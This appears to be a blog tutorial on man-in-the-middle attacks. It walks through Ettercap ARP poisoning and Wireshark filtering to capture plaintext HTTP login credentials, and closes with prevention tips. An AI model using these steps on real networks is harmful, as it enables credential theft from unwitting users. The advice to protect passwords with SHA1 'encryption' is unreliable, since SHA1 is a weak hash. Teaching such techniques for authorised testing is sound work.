Man In The Middle Attack

Man in the middle attack is usually used to capture data packets which are containing sensitive data like username and password. Hackers who are using this technique, should be in the same network with the victims. Man in the middle attack is the further implementation of ARP Spoofing / Poisoning which is already explained in my post. ARP Spoofing / Poisoning will changes the ARP table and makes hackers device as a gateway. In other words, all data packets passing hacker's PC before going to "Real" destination.

This time, I'm explaining this technique for penetrating test only to find your web application vulnerabilities and test your network security. First, you need two applications :

1. Ettercap (For windows, For Linux)
2. Wireshark (link)

After both application installed in your PC, you should follow this steps :

1. Connect to your network and make sure that subnet of your IP address is same with target's IP address. NB: It won't works when connected to network which has 32 network prefix or with subnet 255.255.255.255.

2. Open your ettercap and perform unified sniffing for multiple targets, or bridged sniffing for 2 targets only. I suggest to use unified sniffing because it's more flexible for use to choose the targets. After that choose your network interface.

3. Go to Host and choose Scan for hosts. After that choose your targets or select all targets except gateway IP Address.

4. Go to Mitm on menu bar, and choose ARP Poisoning. After that minimize your Ettercap.

5. Open Wireshark and choose your network interface, then click Start.

6. In this implementation, I'm trying to capture Username and Password which are sent by user from login page of  HTML / PHP Web Application through TCP/HTTP protocol.

7. In this scenario, you will get a thousands of captured data packets. If you think the time is enough, you may click stop button with red color on the top. After that, type "http" on filter search to find all http data packets. Find the POST data info on the table and click on it. After that expand HTML Form URL Encoded and then you get the username and password.

Conclusion

Man in the middle attack technique effectively attacks web application with HTTP protocol and weak network security. Because hackers easily read all non-encrypted data packets which are containing sensitive information like username and password. Also,the core of man in the middle attack is ARP Poisoning/Spoofing. With it, hacker acts as a "fake" network gateway and get all information in that network.

To prevent it, as a common user, we have to make sure that we access the right web application which use SLL/HTTPS encryption. As a programmer, we should implement SSL/HTTPS and also SHA1 encryption for user's password for completing our system security and giving a security warranty of user's personal data. As network administrator, you should read my last post.